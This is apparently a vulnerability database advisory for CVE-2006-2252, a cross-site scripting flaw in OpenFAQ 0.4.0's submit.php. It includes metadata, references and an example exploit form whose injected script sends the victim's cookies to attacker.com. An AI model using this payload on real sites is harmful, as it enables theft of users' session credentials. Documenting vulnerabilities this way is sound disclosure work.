OpenFAQ submit.php Cross-Site Scripting Vulnerability

Vulnerability ID: 1110219
Vulnerability type: Cross-site scripting
Published: 2006-05-06
Updated: 2006-05-09
CVE ID: CVE-2006-2252
CNNVD-ID: CNNVD-200605-153
Platform: PHP
CVSS score: 6.4
|Vulnerability source
https://www.exploit-db.com/exploits/27821
https://cxsecurity.com/issue/WLB-2006050047
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200605-153
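|Vulnerability details
submit.php in OpenFAQ 0.4.0 contains a cross-site scripting vulnerability that allows remote attackers to inject arbitrary web script or HTML via the q parameter.
|Exploit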
source: http://www.securityfocus.com/bid/17860/info

OpenFAQ is prone to an HTML-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in dynamically generated content. 

Attacker-supplied HTML and script code would be executed in the context of the affected website, potentially allowing an attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user; other attacks are also possible.

Example exploit:

<form action=http://host/openfaq-0.4.0/submit.php?ask=go method=post>
<input type=text name=q value="<SCRIPT>document.location='http://attacker.com/get.cgi? value='+escape(document.cookie)</SCRIPT>">
<input type=hidden name=email>
<input type=submit value=Submit>
</form>
|References

Source: BID
Name: 17860
Link: http://www.securityfocus.com/bid/17860
Source: BUGTRAQ
Name: 20060506 OpenFAQ - HTML injection and XSS (Cross Site Scripting)
Link: http://www.securityfocus.com/archive/1/archive/1/433120/100/0/threaded
Source: VUPEN
Name: ADV-2006-1684
Link: http://www.frsirt.com/english/advisories/2006/1684
Source: SECUNIA
Name: 20018
Link: http://secunia.com/advisories/20018
Source: XF
Name: openfaq-submit-xss(26286)
Link: http://xforce.iss.net/xforce/xfdb/26286
Source: OSVDB
Name: 25350
Link: http://www.osvdb.org/25350
Source: SREASON
Name: 850
Link: http://securityreason.com/securityalert/850